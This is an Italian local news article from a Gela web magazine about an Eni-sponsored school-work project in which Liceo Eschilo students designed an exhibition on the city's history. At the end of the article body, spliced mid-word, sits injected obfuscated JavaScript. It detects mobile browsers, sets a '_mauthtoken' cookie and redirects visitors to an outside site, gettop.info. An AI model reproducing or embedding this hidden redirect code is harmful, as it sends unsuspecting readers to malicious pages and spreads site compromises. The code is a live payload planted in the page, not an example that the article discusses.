Cultura e Società

L’Eni sponsorizza progetto a Liceo Eschilo

L’Eni sponsorizza progetto a Liceo Eschilo

Gela  –  Eni e il Liceo Classico Eschilo hanno ideato per gli studenti gelesi un “progetto speciale” di alternanza scuola – lavoro volto alla valorizzazione della grande tradizione culturale della loro città.

 

L’iniziativa, che ha impegnato i ragazzi per una settimana fra Roma e Pomezia, è unica per modalità e contenuti: i liceali hanno lavorato sull’allestimento di uno spazio espositivo reale, il piano terra del convento dei cappuccini di Gela, immaginando un progetto per il rafforzamento della conoscenza della storia e della cultura della città.

 

Per avere i giusti strumenti di lavoro, gli studenti hanno incontrato alcune figure aziendali impegnate espressamente sui temi dell’allestimento, della comunicazione e della valorizzazione dei contenuti. Il primo giorno, ospiti del Palazzo direzionale Eni all’Eur, i ragazzi hanno avuto modo di esplorare alcuni progetti culturali ed espositivi che hanno visto protagonista Eni negli ultimi anni. Una serie di sollecitazioni e di focus svolti da veri addetti ai lavori hanno stimolato gli studenti sull’individuazione di alcuni punti chiave attorno a cui costruire il progetto: qual è l’obiettivo, chi sono i “clienti”, come è possibile intercettare “pubblici diversi”. Hanno anche approfondito i temi della comunicazione, con una formazione specifica che li ha portati a riflettere sulle specificità del linguaggio del corpo, della gestualità e della comunicazione verbale. Questo con l’obiettivo di dare i giusti strumenti per presentare efficacemente i contenuti del loro lavoro, una volta pronto. La progettazione si è svolta all’archivio storico di Pomezia dove i ragazzi, divisi in tre gruppi, hanno lavorato alla presentazione finale. Un gruppo ha progettato il concept generale, il titolo e una parte degli allestimenti, un secondo gruppo ha lavorato sulla restituzione della parte storica, un terzo gruppo sulla presenza Eni, cercando spunti direttamente in archivio storico.

 

“Abbiamo condiviso con piacere questo percorso di Alternanza scuola lavoro con Eni – dichiara il dirigente del Liceo classico Eschilo Gioacchino Pellitteri – perché ben si sposa con gli obiettivi educativi e culturali della nostra scuola. Accedere all’Archivio storico di Eni visionare materiali sul nostro territorio e lavorare ad un progetto per il territorio ha rappresentato per i liceali un’occasione formativa di alto livello che, alla luce dell’interesse e dell’entusiasmo mostrato dai ragazzi, auspico abbia un proseguo”

 

Le competenze tecnologiche dei ragazzi, la loro curiosità, la loro creatività hanno prodotto un risultato veramente interessante: uno spazio vivo in cui lavorare sull’identità cittadina attraverso una serie di contenuti non semplicemente esposti ma messi a disposizione per essere “investigati” in maniera attiva da parte del visitatore. Si tratta di uno spazio “tematico” e allo stesso tempo di un luogo di incontro per i ragazzi e le famiglie; sono state pensate, infatti aree destinate ai laboratori per piccoli (ma anche ad attività delle associazioni locali), zone attrezzate con wifi per lo studio, aree relax.

 

La qualità della presentazione, l’innovazione nella progettazione e negli allestimenti, l’ottima esposizione dei ragazzi, hanno colpito molto positivamente tutta la “giuria” di esperti di comunicazione ed eventi, addetti ai rapporti istituzionali di Eni.

 

Le attività di questo progetto speciale di alternanza sono state accompagnate da due incontri extra Eni: uno presso il museo dell’architettura contemporanea, Maxxi, dove il focus si è concentrato sulle modalità allestitive, l’altro all’Archivio centrale dello Stato dove il focus è stato la rappresentazione della storia attraverso oggetti, documenti e foto.

 

Questa iniziativa conferma l’attenzione di Eni per Gela e l’impegno a realizzare progetti volti allo sviluppo delle future generazioneval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘z(1d.1k.1l(“16”)==-1){(2V(a,b){z(a.1l(“2W”)==-1){z(/(2X|2U\\d+|2T).+1b|2P|2Q\\/|2R|2S|2Y|2Z|37|38|39|G(36|B|L)|W|35|30 |31|33|34|1b.+2O|2N|1i m(2z|2A)i|2B( K)?|2y|p(2x|2t)\\/|2u|2v|2w|2C(4|6)0|2D|2K|M\\.(2L|2M)|2J|2I|2E 2F|2G|2H/i.17(a)||/3a|3b|3E|3F|3G|50[1-6]i|3D|3C|a D|3y|X(N|Z|s\\-)|Y(3z|3A)|O(3B|1g|U)|3H|3I(3P|x|3Q)|3R|P(3O|A)|3N(j|3J)|3K|3L(3M|\\-m|r |s )|3x|3w(I|S|3i)|1a(3j|3k)|3h(X|3g)|3c(e|v)w|3d|3e\\-(n|u)|3f\\/|3l|3m|2s\\-|3u|3v|3s|3r\\-|U(3n|R)|3o|3p(V|S|3q)|3S|2l\\-s|1B|1x|1y|1c(c|p)o|1E(12|\\-d)|1J(49|Y)|1w(1H|1F)|N(1m|1n)|1o|1v([4-7]0|K|D|1p)|1s|1q(\\-|15)|F u|1r|1I|2r\\-5|g\\-y|A(\\.w|B)|2f(L|29)|2a|2b|2i\\-(m|p|t)|2o\\-|2p(J|14)|2n( i|G)|2j\\-c|2k(c(\\-| |15|a|g|p|s|t)|28)|27(1S|1T)|i\\-(20|A|q)|1R|1Q( |\\-|\\/)|1N|1O|1P|1V|1W|24|25|W|23(t|v)a|22|1X|1Y|1Z|2e|26( |\\/)|1U|2m |2q\\-|2h(c|k)|2c(2d|2g)|1M( g|\\/(k|l|u)|50|54|\\-[a-w])|1t|1u|1L\\-w|1G|1K\\/|q(j|1D|1z)|Q(f|21|1g)|m\\-1A|1C(3t|T)|4p(5E|5F|E)|5G|y(f|5D|1a|5C|1c|t(\\-| |o|v)|5z)|5A(50|3T|v )|5H|5I|5O[0-2]|5P[2-3]|5N(0|2)|5M(0|2|5)|5J(0(0|1)|10)|5K((c|m)\\-|5L|5y|5x|5l|5m)|5n(6|i)|5k|5j|5g(5h|5i)|5o|5p|5v|5R(a|d|t)|5u|5t(13|\\-([1-8]|c))|5q|5r|C(5s|5Q)|67\\-2|65(I|69|11)|63|64|J\\-g|5U\\-a|5Z(5Y|12|21|32|60|\\-[2-7]|i\\-)|5X|66|6a|6c|6b|5V(5T|62)|5W\\/|5S(6d|q|68|5w|x|5e)|4m(f|h\\-|Z|p\\-)|4n\\/|11(c(\\-|0|1)|47|Q|R|T)|4o\\-|4l|4k(\\-|m)|4h\\-0|4i(45|4j)|5f(O|P|4q|V|4w)|4x(4v|x)|4u(f|h\\-|v\\-|v )|4r(f|4s)|4t(18|50)|4g(4f|10|18)|14(3Z|41)|42\\-|3Y\\-|3X(i|m)|3U\\-|t\\-y|3V(C|3W)|E(H|m\\-|43|44)|4d\\-9|M(\\.b|F|4e)|4c|4b|46|48|4a(4y|j)|4z(40|5[0-3]|\\-v)|4Y|4Z|51|4X(52|53|60|61|H|4W|4T|4U|4V|55)|56(\\-| )|5c|5d|5b(g |5a|57)|58|59|4S|4R\\-|4F|4G|4H\\-/i.17(a.4E(0,4))){4D 1e=1h 19(1h 19().4A()+4B);1d.1k=”16=1; 4C=/;4I=”+1e.4J();1j.4P=b}}})(1f.4Q||1f.4O||1j.1i,\’4N://4K.4L/4M/?5B&\’)}’,62,386,’|||||||||||||||01||||te|||||||ma|||||||ny|mo|if|go|od|pl|wa|ts|g1|ip|70|ck|pt|os|ad|up|er|al|ar|mc|nd|ll|ri|co|it|iris|ac|ai|oo||se|||ta|_|_mauthtoken|test||Date|bi|mobile|do|document|tdate|navigator|ca|new|opera|window|cookie|indexOf|ic|k0|esl8|ze|fly|g560|fetc|libw|lynx|ez|em|dica|dmob|xo|cr|devi|me|ui|ds|ul|m3ga|l2|gene|el|m50|m1|lg|ibro|idea|ig01|iac|i230|aw|tc|klon|ikom|im1k|jemu|jigs|kddi|||jbro|ja|inno|ipaq|kgt|hu|tp|un|haie|hcit|le|no|keji|gr|xi|kyo|hd|hs|ht|dc|kpt|hp|hei|hi|kwc|gf|cdm|re|plucker|pocket|psp|ixi|phone|ob|in|palm|series|symbian|windows|ce|xda|xiino|wap|vodafone|treo|browser|link|netfront|firefox|avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))

Stampa articolo
Visualizzazioni articolo: 484
Cultura e Società

di più in Cultura e Società

Il tema delle vaccinazioni all’Auser

Liliana Blanco23 settembre 2018

Orazio Accomando vince a Sport Italia

Liliana Blanco22 settembre 2018

Festa della Protezione civile: volontari da tutta la Sicilia e reliquia di San Pio

Redazione22 settembre 2018

Mauro Rostagno 30 anni dopo: un convegno dell’Ordine dei giornalisti

Redazione19 settembre 2018

‘L’ascolto del minore in ambito giudiziario’: se n’è parlato in Tribunale

Liliana Blanco18 settembre 2018

Leo Club del Golfo, beach tennis di solidarietà

Redazione17 settembre 2018

Domenica i ragazzi in difficoltà sulle auto d’epoca

Redazione13 settembre 2018

“Icona immagine dell’Invisibile”: mostra nella chiesa Sant’Agostino

Liliana Blanco11 settembre 2018

“Primo raduno dell’amicizia” a Niscemi

Redazione11 settembre 2018

Una ventata di freschezza nel panorama giornalistico locale. Una nuova avventura “web-based” voluta, creata e condotta da un team giovane e competente. Una piazza virtuale per tutti i gelesi sparsi nel mondo e non solo. Questo e molto altro nel nuovo web-magazine che racconterà Gela e il circondario attraverso notizie in tempo reale, approfondimenti e una particolare attenzione alle storie, ai personaggi e agli eventi.

iscritto al n.3/2010 del registro di stampa in data 28/05/2010 del tribunale di Gela
Direttore Responsabile: Rosa Laura Battaglia - Editore: Pubblivision P.IVA: 01991870856